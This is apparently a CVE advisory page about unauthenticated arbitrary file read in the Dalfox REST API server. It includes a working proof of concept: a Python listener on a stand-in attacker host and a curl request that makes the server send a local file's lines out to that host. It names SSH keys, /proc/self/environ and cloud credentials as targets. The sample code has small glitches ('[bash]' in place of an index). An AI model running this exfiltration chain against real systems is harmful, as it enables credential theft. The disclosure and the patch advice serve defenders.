Dalfox REST API, Arbitrary File Read via custom-payload-file (High)

Listen to this Post

How the CVE works (approx 20 lines):

Dalfox REST API server binds to 0.0.0.0:6664 by default with no API key (–api-key defaults to “”). The /scan endpoint accepts JSON with an options field. The custom-payload-file parameter inside options is directly deserialized into model.Options.CustomPayloadFile. This value is passed unchanged through dalfox.Initialize() into the scan engine. In pkg/scanning/scan.go lines 341-366, when skip-discovery is true (attacker-controlled), the engine calls voltFile.ReadLinesOrLiteral(options.CustomPayloadFile). This reads every line from any file path accessible to the dalfox process. Each line becomes an XSS payload embedded into a query parameter (e.g., ?q=) of HTTP requests sent to the attacker-supplied target URL. The attacker controls the target URL in the same JSON request. The condition options.SkipDiscovery || utils.IsAllowType(policy[“Content-Type”]) is satisfied by setting skip-discovery:true. The attacker also supplies param:[“q”] to meet the -p requirement. No authentication middleware is registered because APIKey==””. Thus an unauthenticated attacker can exfiltrate any file (e.g., /etc/passwd, SSH keys, /proc/self/environ) line by line via outbound scan traffic.

dailycve form:

Platform: Dalfox REST API
Version: All default configs
Vulnerability: Arbitrary file read
Severity: High (7.5)
date: 2026-05-12

Prediction: Vendor patch pending

What Undercode Say:

Analytics – bash commands and codes from

Start receiver on attacker machine
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
def do_GET(self):
q = parse_qs(urlparse(self.path).query).get('q', [''])[bash]
print("[bash] q =", q, flush=True)
self.send_response(200)
self.end_headers()
HTTPServer(('0.0.0.0', 18081), H).serve_forever()
PY
Start dalfox server (vulnerable)
go run . server --host 0.0.0.0 --port 16664 --type rest
Exfiltrate /etc/hostname
curl -s -X POST http://target:16664/scan \
-H 'Content-Type: application/json' \
--data '{
"url": "http://attacker:18081/?q=test",
"options": {
"custom-payload-file": "/etc/hostname",
"only-custom-payload": true,
"skip-discovery": true,
"param": ["q"],
"use-headless": false,
"worker": 1
}
}'

Exploit:

Send POST /scan with JSON containing attacker-controlled url and options.custom-payload-file set to target file path. Set skip-discovery:true and param:[“q”]. No X-API-Key header needed. Each line of the file is sent as ?q= to attacker’s HTTP server.

Protection from this CVE:

  1. Strip dangerous fields in postScanHandler: set rq.Options.CustomPayloadFile = “” (and other filesystem fields). 2. Require –api-key at server startup and refuse to run without it. 3. Apply both together.

Impact:

Arbitrary file read on dalfox host: SSH private keys, .env, cloud credentials, /proc/self/environ. No authentication under default config. Exfiltration via outbound HTTP scan traffic. Combined with found-action RCE, attacker can read secrets then execute commands.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top